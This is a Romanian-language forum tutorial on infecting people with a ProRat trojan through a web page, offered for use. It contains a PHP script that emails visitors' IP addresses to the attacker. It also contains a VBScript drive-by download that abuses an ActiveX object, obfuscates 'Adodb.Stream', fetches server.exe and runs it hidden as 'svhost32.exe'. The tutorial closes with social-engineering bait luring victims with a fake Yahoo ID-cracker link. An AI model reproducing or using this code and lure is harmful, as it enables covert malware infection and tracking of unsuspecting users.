cum ? ii foarte simplu
iei proratu si faci un server.exe sper ca intzelegetzi ca nu am chef sa explic ]
apoi iti faci o pagina pe net [ex.: intri aicea si iti faci user .. bal bal bal ]
apoi intri in notepad si scrii
Code:
<head>
<title>Acesta Pagina Are O Eroare In Script ! Vei FIi Redirectzionat </title>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://site.freepage.ro/virus.HTM">
</head>
<body>
<?php
session_start();
$ip = $_SERVER['REMOTE_ADDR'];
$message .= "Info:n";
$message .= "IP: ".$ip."n";
$message .= "n";
$mailu = "yourEmail @ yahoo.com";
$subject = "TROJAN ";
$headers = "fraier";
$headers .= $_POST['user']."n";
$headers .= "MIME-Version: 1.0n";
(mail($mailu,$subject,$message,$headers));
echo "I Love You"
?>
</body>
</html>
modifici in loc de yourEmail @ yahoo.com = cu mail`u tau
si in loc de site.freepage.ro pui site`u tau
dai save ass
Code:
index.PHP
(acest index.PHP iti va trimite ip`u lamerului care va loa trojanu`l )
Acuma hai sa facem o schema care sa downloadeze si sa ruleze trojanu`l automat pe p.c. :
intri in notepad si scrii
Code:
<script language="VBScript">
on error resume next
dl = "http://site.freepage.ro/server.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svhost32.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
modifica site.freepage.ro cu site`u tau
dam SAVE ASS
Code:
virus.HTM
Bun acum avem cele 2 fishiere : index.php si virus.htm
le punem pe ftp`u de la as (sau unde ai cont :d )
si urcam trojanu`l , adica server.exe
dupa ce am uploadat aceste 3 fishiere ii dam site`u la un loosser (sa zicem ca site`ul tau ii http://hack.as.ro )
intri pe mess si dai un g.m. " cel mai tare program care sparge id de YM casa il downloadezi intra pe http://hack.as.ro "
si indecurs de 5 minute primeshti pe mail o gramada de ip`uri infectate ) ))
P.S.: merge doar pe IE
bafta